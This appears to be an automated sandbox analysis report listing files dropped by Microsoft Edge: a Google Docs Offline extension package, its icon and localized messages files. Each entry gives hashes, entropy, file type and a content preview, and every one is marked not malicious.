                                                                                                                                                                                                                                                                                                                        Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\f910909b-07d5-4505-b770-cfbf1a169e16.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\445af71d-5754-4fbe-9156-311fe80c8cdf.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):138356
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                        MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                        SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                        SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                        SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                        Malicious:false
